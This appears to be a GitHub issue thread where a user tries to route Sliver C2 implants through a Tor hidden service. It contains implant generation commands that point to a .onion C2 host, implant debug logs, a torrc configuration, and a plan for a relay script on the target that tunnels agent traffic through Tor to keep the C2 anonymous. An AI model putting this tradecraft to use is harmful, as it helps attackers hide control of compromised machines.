Open pixelBaron117 opened 1 month ago
generate --http [hidden].onion:6969?proxy=127.0.0.1:9050 -o windows -G -d -O dbg
sliver > jobs
ID Name Protocol Port Stage Profile
==== ====== ========== ====== ===============
11 http tcp 6969
output :
2024/05/22 20:35:30 session.go:172: Connecting -> http(s)://[hidden].onion:6969
2024/05/22 20:35:30 session.go:84: Next CC = https://[hidden].onion:6969?proxy=127.0.0.1:9050
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 transports.go:92: Yield c2 uri = 'https://[hidden].onion:6969?proxy=127.0.0.1:9050'
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = rpc, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2354917 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "https://[hidden].onion:6969/rpc.html?b=[hidden]&sm=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 drivers_windows.go:36: Using go http driver
2024/05/22 20:35:30 gohttp.go:97: Force proxy "127.0.0.1:9050"
2024/05/22 20:35:30 httpclient.go:652: [http] segments = [], filename = register, ext = php
2024/05/22 20:35:30 crypto.go:217: TOTP Code (2024-05-22 18:35:30.2394831 +0000 UTC): [hidden]
2024/05/22 20:35:30 httpclient.go:339: [http] POST -> http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden] (266 bytes)
2024/05/22 20:35:30 httpclient.go:345: [http] http response error: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 session.go:178: http(s) connection error Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:158: [session] failed to establish connection: Post "http://[hidden].onion:6969/register.html?ch=[hidden]&u=[hidden]": dial tcp: lookup [hidden].onion: no such host
2024/05/22 20:35:30 sliver.go:138: Reconnect sleep: 1m0s
It seems the proxy is correctly used, but the sessions can't connect to the hidden service.
The hidden service Tor configuration:
GNU nano 6.2 torrc
# This is the configuration for Tor
SocksPort 9050 #
# HiSer
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 6969 127.0.0.1:6969
Based on the debug output, the implant seems to behave correctly, using the proxy and sending HTTP requests. According to my information, the Tor proxy is compatible with standard HTTP requests. Therefore, I don't understand why it isn't working.
While waiting for potential integration into Sliver, I've created a Python script that serves as a relay to route communications through the Tor network using an mTLS agent. How It Works:
Agent Communication:
The Sliver agent is configured to communicate with 127.0.0.1:6666, thinking it is directly talking to the Sliver C2 server.
Proxy on the Target:
A Python proxy script runs on the target machine and listens on 127.0.0.1:6666 for incoming connections from the Sliver agent.
Redirection Through Tor:
The proxy script establishes a connection to the Sliver C2 server using the Tor network. This is done through a SOCKS5 proxy running on 127.0.0.1:9050 towards the hidden service (.onion address).
Data Forwarding:
The script forwards all data from the Sliver agent to the Sliver C2 server through Tor and sends back responses to the agent, ensuring seamless bidirectional communication.
Detailed Setup: Sliver C2 Server:
The Sliver C2 server listens on port 9999 for incoming connections.
Tor Hidden Service:
Configure the hidden service to listen on port 9999 and forward traffic to port 9999 on the Sliver C2 server.
The .onion address of this hidden service is used by the proxy script to route traffic through Tor.
Python Proxy Script:
The proxy script runs on the target machine.
It listens on 127.0.0.1:6666 for connections from the Sliver agent.
When a connection is received, the proxy script uses PySocks to establish a connection to the hidden service address through the Tor network.
It then forwards all data from the Sliver agent to the Sliver C2 server through the Tor network and vice versa.
This setup allows the mTLS agent to route its communications securely through the Tor network without any modifications to the Sliver agent itself.
Hello,
I've done some research but couldn't find a clear answer to my question.
Sliver supports handling HTTP proxies, but apparently not SOCKS5 proxies.
Therefore, I would like to know if it is possible to configure a beacon to use a pre-installed SOCKS5 proxy on the client.
For example:
generate beacon --http dasdasdas.onion --proxy socks5://127.0.0.1:9050 --os windows --arch amd64 --format exe --save /var/www/html
The goal is to keep the C2 anonymous without expensive intermediary servers.
As a starting solution, I found tor2web, but the domains are not stable over time, which reduces the robustness of the link (if a domain no longer works, then the beacon is no longer accessible). Setting up a tor2web reduces anonymity and has a certain cost.
Thank you in advance.